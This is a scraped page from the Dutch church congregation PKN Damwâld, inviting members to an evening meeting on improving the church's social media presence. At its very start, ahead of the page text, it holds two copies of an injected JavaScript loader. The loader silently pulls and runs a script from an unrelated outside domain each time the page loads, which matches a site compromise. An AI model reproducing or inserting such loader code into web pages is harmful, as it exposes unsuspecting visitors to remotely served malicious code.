;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Communicatie: Zeg het voort …. - PKN Damwâld

Communicatie: Zeg het voort ….

Gepubliceerd op: maandag 25 oktober 2021

De wereld van sociale media is voortdurend in ontwikkeling. Zo verschuiven doelgroepen nogal eens en komen er nieuwe mogelijkheden bij. Het is als kerk daarom geen gek idee om het beleid of keuzes rondom sociale media regelmatig onder de loep te houden. Bereiken we nog de mensen die we voor ogen hebben? Hoe zijn we als kerk op aansprekende wijze online aanwezig en vindbaar? Hoe kunnen we sociale media (nog) beter inzetten als geloofsgemeenschap? Hoe kunnen we daarin direct een verbeterslag maken?

Als kerk bieden we ruimte aan gelovigen en twijfelaars, geïnspireerde en zoekers, mensen die al een leven lang geloven en mensen die net door het geloof geraakt zijn. De doelgroep waarmee we communiceren is dan ook erg divers. En hoe kunnen we – met een beperkt budget en de inzet van vrijwilligers – sociale media en internet hier nog actiever bij inzetten?

Heb jij gaven, talenten en/of creatieve ideeën op het gebied van internet en social media? Denk dan met ons mee op maandag 8 november 2021, 19.30 uur in ’t Skûlplak.

Meer informatie? Mail naar klik hier